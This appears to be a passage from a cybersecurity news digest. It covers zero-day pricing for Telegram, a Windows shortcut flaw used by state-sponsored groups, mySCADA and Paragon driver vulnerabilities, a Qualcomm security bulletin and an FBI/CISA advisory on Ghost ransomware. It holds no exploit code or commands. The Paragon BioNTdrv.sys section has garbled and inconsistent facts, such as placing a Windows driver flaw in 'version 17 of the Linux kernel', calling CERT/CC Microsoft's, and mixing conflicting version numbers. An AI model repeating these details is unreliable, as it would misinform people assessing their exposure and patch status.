A source familiar with the exploit market suggested that Operation Zero’s prices might be on the lower side, as the company could intend to resell these vulnerabilities multiple times at a higher margin.

“I don’t think they’ll actually pay full [price]. There will be some bar the exploit doesn’t clear, and they’ll only do a partial payment,” said the source.

Another industry expert noted that pricing depends on factors like exclusivity and whether Operation Zero intends to redevelop the exploits internally or act solely as a broker.

The Ukrainian government recently banned the use of Telegram for government and military personnel due to concerns over potential exploitation by Russian state-backed hackers. Security researchers have long warned that Telegram is less secure than alternatives like Signal and WhatsApp, primarily because it does not use end-to-end encryption by default.

“The vast majority of one-on-one Telegram conversations — and literally every single group chat — are probably visible on Telegram’s servers,” said cryptography expert Matthew Green.

Despite this, Telegram spokesperson Remi Vaughn stated: “Telegram has never been vulnerable to a zero-click exploit,” while also emphasizing the company’s bug bounty program.

The zero-day market has become increasingly competitive, driving up prices. In 2023, a WhatsApp zero-day was reportedly valued at $8 million. Operation Zero has previously offered $20 million for exploits capable of fully compromising iOS and Android devices but currently caps those payouts at $2.5 million.

With cyber threats escalating, the demand for zero-days—especially for widely used platforms like Telegram—remains at an all-time high.

Windows Shortcut Vulnerability Exploited by 11 State-Sponsored Outfits

 

Since 2017, at least 11 state-sponsored threat groups have actively exploited a Microsoft zero-day issue that allows for abuse of Windows shortcut files to steal data and commit cyber espionage against organisations across multiple industries. 

Threat analysts from Trend Micro's Trend Zero Day Initiative (ZDI) discovered roughly 1,000 malicious.lnk files that exploited the flaw, known as ZDI-CAN-25373, which allowed cyber criminals to execute concealed malicious commands on a victim's PC via customised shortcut files.

“By exploiting this vulnerability, an attacker can prepare a malicious .lnk file for delivery to a victim,” researchers at Trend Micro noted. “Upon examining the file using the Windows-provided user interface, the victim will not be able to tell that the file contains any malicious content.”

The malicious files delivered by cybercriminals include a variety of payloads, including the Lumma infostealer and the Remcos remote access Trojan (RAT), which expose organisations to data theft and cyber espionage. 

State-sponsored outfits from North Korea, Iran, Russia, and China, as well as non-state actors, are among those behind the flaw attacks, which have affected organisations in the government, financial, telecommunications, military, and energy sectors across North America, Europe, Asia, South America, and Australia. 

Additionally, 45% of attacks were carried out by North Korean players, with Iran, Russia, and China each accounting for approximately 18%. Some of the groups listed as attackers are Evil Corp, Kimsuky, Bitter, and Mustang Panda, among others.

According to Trend Micro, Microsoft has not fixed the flaw despite receiving a proof-of-concept exploit through Trend ZDI's bug bounty program. Trend Micro did not react to a follow-up request for comment on their flaw detection and submission timeline.

Microsoft's position remains that it will not be fixing the vulnerability described by Trend Micro at this time because it "does not meet the bar for immediate servicing under our severity classification guidelines," though the company "will consider addressing it in a future feature release," according to an email from a Microsoft spokesperson.

Meanwhile, Microsoft Defender can detect and block threat behaviour, as detailed by Trend Micro, and Microsoft's Windows Smart App Control prevents malicious files from being downloaded from the internet. Furthermore, Windows recognises shortcut (.lnk) files as potentially malicious file types, and the system will automatically display a warning if a user attempts to download one.

Critical Security Flaws Discovered in mySCADA myPRO SCADA System

Cybersecurity researchers have identified two high-severity vulnerabilities in mySCADA myPRO, a Supervisory Control and Data Acquisition (SCADA) system widely used in operational technology (OT) environments. These flaws could allow threat actors to gain unauthorized control over affected systems.

"These vulnerabilities, if exploited, could grant unauthorized access to industrial control networks, potentially leading to severe operational disruptions and financial losses," said Swiss security firm PRODAFT.

Both security flaws are rated 9.3 on the CVSS v4 scale and stem from operating system command injection issues:
  • CVE-2025-20014 – Allows attackers to execute arbitrary commands via crafted POST requests with a version parameter.
  • CVE-2025-20061 – Enables remote command execution using a POST request with an email parameter.
If exploited, these vulnerabilities could enable command injection and arbitrary code execution on affected systems.

Security Updates & Mitigation Measures

The issues have been addressed in the following patched versions:
  • mySCADA PRO Manager 1.3
  • mySCADA PRO Runtime 9.2.1
PRODAFT attributes the flaws to improper input validation, which creates an entry point for command injection attacks.

"These vulnerabilities highlight the persistent security risks in SCADA systems and the need for stronger defenses," the company stated. "Exploitation could lead to operational disruptions, financial losses, and safety hazards."

Organizations using mySCADA myPRO should take immediate action by:
  1. Applying the latest patches to eliminate vulnerabilities.
  2. Isolating SCADA systems from IT networks through network segmentation.
  3. Enforcing strong authentication measures to prevent unauthorized access.
  4. Monitoring system activity for signs of suspicious behavior.
By implementing these cybersecurity best practices, organizations can fortify their SCADA environments against potential attacks.

Cybercriminals Target Paragon Partition Manager Vulnerability in BYOVD Attacks

 


It has been reported that threat actors have been actively exploiting a security vulnerability within the BioNTdrv.sys driver of Paragon Partition Manager in ransomware attacks by elevating privileges and executing arbitrary code under the guise of attacks. The CERT Coordination Center (CERT/CC) has identified this zero-day vulnerability as CVE-2025-0289, one of five security flaws discovered by Microsoft during the past year. 

Other flaws have been identified, including arbitrary memory mapping, arbitrary memory write, null pointer dereferences, insecure kernel resource access, and arbitrary memory move vulnerabilities. It is especially concerning that an adversary may be able to exploit this vulnerability. It involves a Microsoft-signed driver, which allows adversaries to take advantage of the Bring Your Own Vulnerable Driver (BYOVD) technique. 

Using this method, attackers can compromise systems regardless of whether Paragon Partition Manager is installed, broadening the attack surface significantly. As BioNTdrv.sys operates at the kernel level, threat actors can exploit these vulnerabilities to execute commands with elevated privileges. This allows them to bypass security measures and defensive software, as attackers can access the system and deploy additional malicious payloads. 

Even though Microsoft researchers have identified all five security flaws, the company can not divulge what ransomware groups have been leveraging CVE-2025-0289 to execute their attacks. They are only aware that it has been weaponized in ransomware operations. A bulletin issued by Microsoft's CERT Coordination Center (CERT/CC) indicated that threat actors have been exploiting this vulnerability to conduct BYOVD-based ransomware attacks. 

According to the CVE-2025-0289 vulnerability, further malicious code within compromised environments can be executed by exploiting this vulnerability to escalate privileges to the SYSTEM level. This vulnerability can be exploited to facilitate the exploitation of BYOVD attacks, even on systems where the affected driver is not installed, and this can result in threat actors gaining elevated privileges and executing malicious code without the protection of security systems in place. 

As part of the identified security flaws affecting BioNTdrv.sys versions 1.3.0 and 1.5.1, CVE-2025-0285 is a flaw in version 7.9.1 which permits the mapping of kernel memory to arbitrary user inputs by not properly validating the length of the input. By exploiting this vulnerability, the user can escalate their privileges even further. 

There is a CVE-2025-0286 vulnerability that exists in version 7.9.1, resulting from improper validation of input controlled by users, which allows attackers to exploit this flaw to execute malicious code on the target machine. An unprivileged code execution vulnerability has been found in version 7.9.1, caused by an insufficient MasterLrp structure in the input buffer, which can result in a null pointer dereference vulnerability. 

Successful exploit allows arbitrary kernel-level code to be executed, facilitating privilege escalation and further misuse. Version 7.9.1 contains a vulnerability in the memmove function. This function fails to properly sanitize user-supplied data, allowing attackers to manipulate kernel memory and escalate privileges. 

Inversion of the CVE-2025-0289 vulnerability, an insecure kernel resource access vulnerability, has been found in version 17 of the Linux kernel due to a failure to validate the MappedSystemVa pointer before passing it to HalReturnToFirmware during the detection process. By exploiting this vulnerability, attackers can compromise the system. 

This security vulnerability has been addressed by Paragon Software by releasing the updated driver BioNTdrv.sys version 2.0.0 across all products within Paragon Software's Hard Disk Manager suite, including Partition Manager versions 17.45.0 and later versions. This update has been developed to reduce the risks associated with the previously identified security vulnerabilities. 

There is also a dedicated security patch available for 64-bit versions of Windows 10, Windows 11, and Windows Server 2016, 2019, 2022, and 2025 that will provide users with an additional layer of protection against any exploits that might occur in the future, thereby enhancing the level of security. As part of Microsoft's efforts to protect its ecosystem, it has updated its Vulnerable Driver Blocklist, which effectively disables the execution of BioNTdrv.sys versions that are compromised within Windows environments, thereby preventing exploitation. 

Users and enterprises are strongly encouraged to ensure that this protection mechanism is kept in place to prevent exploitation. In light of the ongoing threat posed by these vulnerabilities, especially as a result of ransomware attacks, all users of Paragon Partition Manager and its associated products must update their software as soon as possible to the newest version available. 

As a further precaution, all Windows users should make sure that they enable the Microsoft Vulnerable Driver Blocklist feature as soon as possible. This is because it serves as a critical defense against BYOVD (Bring Your Vulnerable Driver) attacks, where outdated or insecure drivers are leveraged to elicit privileges and compromise a computer system.

Qualcomm Identifies and Patches Critical Security Issues in Latest Update

 


Several vulnerabilities were identified in Qualcomm's latest security update for March 2025 that impacted many products, including automotive systems, mobile chipsets, and networking devices. There are several critical security issues in this security bulletin, including memory corruption risks and input validation flaws that could pose a significant security risk if exploited to compromise the system. 

The Qualcomm Security Updates are intended to improve the security of Qualcomm's technology ecosystem as well as strengthen its protection against possible cyber threats. There had been multiple security vulnerabilities identified and resolved by Qualcomm and MediaTek over the last few weeks, some of which had already been addressed by their respective Android updates, which were deployed in the previous weeks. 

Qualcomm released the March 2025 Security Bulletin, which outlined 14 vulnerabilities, all of which were addressed via upstream updates to its proprietary software, highlighting the serious potential risks associated with these security vulnerabilities. These security flaws are most of the time classified as critical or high severity, highlighting the seriousness of the threat they pose to users. Several of the vulnerabilities identified by Qualcomm include memory corruption, affecting Qualcomm's automotive software platform based on the QNX operating system.

Qualcomm has also released patches to resolve five high-severity vulnerabilities, which could result in information disclosures, denial-of-service (DoS) attacks, and memory corruption as a result. Furthermore, two moderate-severity flaws have been addressed as part of the latest security updates launched by the semiconductor manufacturer. 

The semiconductor manufacturer has also resolved seven high-severity defects and six medium-severe defects within open-source components launched by the manufacturer. As a result of these security patches, Qualcomm emphasized that OEMs (original equipment manufacturers) are being actively notified of the updates and urged them to implement the fixes on deployed devices as soon as possible. 

It is noteworthy that Google's March 2025 Android security update addressed three of the identified vulnerabilities: CVE-2024-43051, CVE-2025-53011, and CVE-2024-53025. It has been revealed that MediaTek has discovered ten security vulnerabilities that impact multiple chipsets. As part of the release of the company's fixes, three high-severity issues have been found, including a memory corruption flaw in modems, which can lead to DoS attacks, as well as an out-of-bounds write vulnerability in KeyInstall and WLAN, which can lead to escalation of privileges. 

This security bulletin from Qualcomm not only addresses vulnerabilities identified in proprietary software, but also vulnerabilities in open-source components that Qualcomm's products are integrated with. There are several security flaws affecting Android operating systems, camera drivers, and multimedia frameworks, among others. Qualcomm intends to mitigate the potential risks of these vulnerabilities by informing its customers and partners and strongly urging that patches be deployed as soon as possible to mitigate these risks. 

Users of Qualcomm-powered devices should check with their device manufacturers to learn about the availability of security updates and patches for those devices. During the last few months, Qualcomm has released a series of security updates demonstrating its commitment to increasing cybersecurity across all its product lines. By addressing critical vulnerabilities and working closely with original equipment manufacturers (OEMs) to facilitate timely patch deployments, the company aims to decrease security risks and enhance the integrity of its systems. 

As the threat of cyber-attacks continues to evolve, maintaining robust security measures through regular updates is imperative. According to Qualcomm, their users are encouraged to stay informed about security developments and to ensure they get the latest patches installed on their devices to prevent any possible exploitation of the vulnerabilities. In addition, organizations that are utilizing Snapdragon-powered systems are also encouraged to make sure that these updates are implemented promptly as a means of ensuring that their technology infrastructure is secure and reliable.

FBI And CISA Issues Warning of Ongoing ‘Ghost’ Ransomware Attack

 

Ghost, a ransomware outfit, has been exploiting software and firmware flaws since January, according to an FBI and Cybersecurity and Infrastructure Security Agency (CISA) advisory issued last week.

The outfit, also known as Cring and based in China, focusses on internet-facing services with unpatched vulnerabilities that users might have fixed years ago, according to the agencies. Cybersecurity researchers initially raised concerns about the group in 2021. 

"This indiscriminate targeting of networks containing vulnerabilities has resulted in the compromise of organisations in more than 70 countries, including China," according to the notice issued by the Multi-State Information Sharing and Analysis Centre (MS-ISAC).

The notice lists the following vulnerabilities: Microsoft Exchange servers that are still vulnerable to the ProxyShell attack chain; servers running Adobe's ColdFusion for web applications; and issues in unpatched Fortinet security appliances. 
 
Critical infrastructure, schools and universities, healthcare, government networks, religious institutions, technology and manufacturing companies, and numerous small- and medium-sized businesses are among the listed victims since 2021, according to the notice. The goal is financial gain, with ransom demands occasionally amounting to hundreds of thousands of dollars.

“Persistence is not a major focus for Ghost actors, as they typically only spend a few days on victim networks,” the agencies further added. “In multiple instances, they have been observed proceeding from initial compromise to the deployment of ransomware within the same day.” 

The notice claims that the ransomware outfit employs common hacking tools like Cobalt Strike and Mimikatz, and that the malware they deploy frequently has file names like Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe. 

“The impact of Ghost ransomware activity varies widely on a victim-to-victim basis,” the agencies concluded. “Ghost actors tend to move to other targets when confronted with hardened systems, such as those where proper network segmentation prevents lateral moment to other devices.” 

Prevention tips 

To combat against Ghost ransomware attacks, network defenders should take the following steps:

  • Create regular, off-site system backups that cannot be encrypted by ransomware. 
  • Patch the operating system, software, and firmware vulnerabilities as quickly as feasible.
  • Focus on the security holes targeted by Ghost ransomware (i.e., CVE-2018-13379, CVE-2010-2861, CVE-2009-3960, CVE-2021-34473, CVE-2021-34523, CVE-2021-31207). 
  • Segment networks to restrict lateral movement from compromised devices. 
  • Implement phishing-resistant multi-factor authentication (MFA) for all privileged accounts and email service accounts.